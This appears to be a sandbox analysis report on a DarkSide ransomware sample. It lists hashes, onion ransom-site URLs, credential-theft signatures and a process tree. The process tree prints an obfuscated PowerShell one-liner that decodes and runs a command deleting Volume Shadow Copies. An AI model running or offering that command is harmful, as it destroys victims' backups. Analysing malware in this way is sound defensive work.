Overview
overview
10Static
static
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
7Resubmissions
28-07-2024 16:38
240728-t5tryssgmm 1007-07-2024 14:07
240707-rfgd8atekm 1007-07-2024 14:07
240707-re689awdpe 1013-09-2022 17:54
220913-wg1lpsgbg7 10Analysis
-
max time kernel
29s -
max time network
37s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
28-07-2024 16:38
Static task
static1
Behavioral task
behavioral1
Sample
RansomwareSamples/Avaddon_09_06_2020_1054KB.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
RansomwareSamples/Avaddon_09_06_2020_1054KB.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral3
Sample
RansomwareSamples/Avos_18_07_2021_403KB.exe
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
RansomwareSamples/Avos_18_07_2021_403KB.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral5
Sample
RansomwareSamples/Babik_04_01_2021_31KB.exe
Resource
win7-20240708-en
Behavioral task
behavioral6
Sample
RansomwareSamples/Babik_04_01_2021_31KB.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral7
Sample
RansomwareSamples/Babuk_20_04_2021_79KB.exe
Resource
win7-20240705-en
Behavioral task
behavioral8
Sample
RansomwareSamples/Babuk_20_04_2021_79KB.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral9
Sample
RansomwareSamples/BlackKingdom_23_03_2021_12460KB.exe
Resource
win7-20240704-en
Behavioral task
behavioral10
Sample
RansomwareSamples/BlackKingdom_23_03_2021_12460KB.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral11
Sample
RansomwareSamples/BlackMatter_02_08_2021_67KB.exe
Resource
win7-20240704-en
Behavioral task
behavioral12
Sample
RansomwareSamples/BlackMatter_02_08_2021_67KB.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral13
Sample
RansomwareSamples/Conti_22_12_2020_186KB.exe
Resource
win7-20240708-en
Behavioral task
behavioral14
Sample
RansomwareSamples/Conti_22_12_2020_186KB.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral15
Sample
RansomwareSamples/Cuba_08_03_2021_1130KB.exe
Resource
win7-20240708-en
Behavioral task
behavioral16
Sample
RansomwareSamples/Cuba_08_03_2021_1130KB.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral17
Sample
RansomwareSamples/DarkSide_01_05_2021_30KB.exe
Resource
win7-20240704-en
Behavioral task
behavioral18
Sample
RansomwareSamples/DarkSide_01_05_2021_30KB.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral19
Sample
RansomwareSamples/DarkSide_16_01_2021_59KB.exe
Resource
win7-20240708-en
Behavioral task
behavioral20
Sample
RansomwareSamples/DarkSide_16_01_2021_59KB.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral21
Sample
RansomwareSamples/DarkSide_18_11_2020_17KB.exe
Resource
win7-20240705-en
Behavioral task
behavioral22
Sample
RansomwareSamples/DarkSide_18_11_2020_17KB.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral23
Sample
RansomwareSamples/DearCry_13_03_2021_1292KB.exe
Resource
win7-20240704-en
Behavioral task
behavioral24
Sample
RansomwareSamples/DearCry_13_03_2021_1292KB.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral25
Sample
RansomwareSamples/Hades_29_03_2021_1909KB.exe
Resource
win7-20240705-en
Behavioral task
behavioral26
Sample
RansomwareSamples/Hades_29_03_2021_1909KB.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral27
Sample
RansomwareSamples/Hive_17_07_2021_808KB.exe
Resource
win7-20240704-en
Behavioral task
behavioral28
Sample
RansomwareSamples/Hive_17_07_2021_808KB.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral29
Sample
RansomwareSamples/LockBit_14_02_2021_146KB.exe
Resource
win7-20240708-en
Behavioral task
behavioral30
Sample
RansomwareSamples/LockBit_14_02_2021_146KB.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral31
Sample
RansomwareSamples/MAKOP_27_10_2020_115KB.exe
Resource
win7-20240705-en
Behavioral task
behavioral32
Sample
RansomwareSamples/MAKOP_27_10_2020_115KB.exe
Resource
win10v2004-20240709-en
General
-
Target
RansomwareSamples/DarkSide_18_11_2020_17KB.exe
-
Size
17KB
-
MD5
f87a2e1c3d148a67eaeb696b1ab69133
-
SHA1
d1dfe82775c1d698dd7861d6dfa1352a74551d35
-
SHA256
9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297
-
SHA512
e361811b07a66d9a784be37bdace0bdec9e11374083d7ccf7d9830e47a59afa8b9d12d80d4d47ea1932116354ad60bbc8ea6a6a265885d264b35486986415ea3
-
SSDEEP
384:SGyUrEk/yEoQE+yckIYN/pBa3AWK3T2oTboHblKR/:l4klFypIYFpB/x9ngb
Malware Config
Extracted
C:\Users\README.e528f7ef.TXT
darkside
http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC
http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Renames multiple (143) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral21/memory/3068-0-0x0000000000C40000-0x0000000000C50000-memory.dmp upx behavioral21/memory/3068-12-0x0000000000C40000-0x0000000000C50000-memory.dmp upx behavioral21/memory/3068-23-0x0000000000C40000-0x0000000000C50000-memory.dmp upx behavioral21/memory/3068-211-0x0000000000C40000-0x0000000000C50000-memory.dmp upx -
pid Process 580 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DarkSide_18_11_2020_17KB.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3068 DarkSide_18_11_2020_17KB.exe 3068 DarkSide_18_11_2020_17KB.exe 580 powershell.exe 3068 DarkSide_18_11_2020_17KB.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 3068 DarkSide_18_11_2020_17KB.exe Token: SeSecurityPrivilege 3068 DarkSide_18_11_2020_17KB.exe Token: SeTakeOwnershipPrivilege 3068 DarkSide_18_11_2020_17KB.exe Token: SeLoadDriverPrivilege 3068 DarkSide_18_11_2020_17KB.exe Token: SeSystemProfilePrivilege 3068 DarkSide_18_11_2020_17KB.exe Token: SeSystemtimePrivilege 3068 DarkSide_18_11_2020_17KB.exe Token: SeProfSingleProcessPrivilege 3068 DarkSide_18_11_2020_17KB.exe Token: SeIncBasePriorityPrivilege 3068 DarkSide_18_11_2020_17KB.exe Token: SeCreatePagefilePrivilege 3068 DarkSide_18_11_2020_17KB.exe Token: SeBackupPrivilege 3068 DarkSide_18_11_2020_17KB.exe Token: SeRestorePrivilege 3068 DarkSide_18_11_2020_17KB.exe Token: SeShutdownPrivilege 3068 DarkSide_18_11_2020_17KB.exe Token: SeDebugPrivilege 3068 DarkSide_18_11_2020_17KB.exe Token: SeSystemEnvironmentPrivilege 3068 DarkSide_18_11_2020_17KB.exe Token: SeRemoteShutdownPrivilege 3068 DarkSide_18_11_2020_17KB.exe Token: SeUndockPrivilege 3068 DarkSide_18_11_2020_17KB.exe Token: SeManageVolumePrivilege 3068 DarkSide_18_11_2020_17KB.exe Token: 33 3068 DarkSide_18_11_2020_17KB.exe Token: 34 3068 DarkSide_18_11_2020_17KB.exe Token: 35 3068 DarkSide_18_11_2020_17KB.exe Token: SeDebugPrivilege 580 powershell.exe Token: SeBackupPrivilege 3032 vssvc.exe Token: SeRestorePrivilege 3032 vssvc.exe Token: SeAuditPrivilege 3032 vssvc.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3068 wrote to memory of 580 3068 DarkSide_18_11_2020_17KB.exe 29 PID 3068 wrote to memory of 580 3068 DarkSide_18_11_2020_17KB.exe 29 PID 3068 wrote to memory of 580 3068 DarkSide_18_11_2020_17KB.exe 29 PID 3068 wrote to memory of 580 3068 DarkSide_18_11_2020_17KB.exe 29 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:580
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3032
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD539ca3a64d512eb6223252000fce5e706
SHA1b6a218024c140101e0f25026795107e803756cc6
SHA256208eac0667def9a016803ce9dfaf8c948324045a2570073d7a847608e538264c
SHA51268700aa3c74cfc01af8f7e6a019653c2b5ae2ca778e76ef806d1d643ae46c01113cf20abe43e81d205e086a4844594578fd114fc118b711616425c9e95014c31
-
Filesize
2KB
MD525d0b19a0ec34a39dfa3e177866f01a3
SHA1a3704d1f6499738ccd694bdd6008a850c6b2e453
SHA256f030ee74e406acb06d43e73c5127df0206e8affc85b95e9895b100d89391dea8
SHA512ede7562f04b5f9abf792196ae87d82e14d651dc70e9a5b5ec0e9cb14d13aba27f8ebfacda2191de48dff882131dfad8c7bad51e7fb89b71dd3bbe748adc77198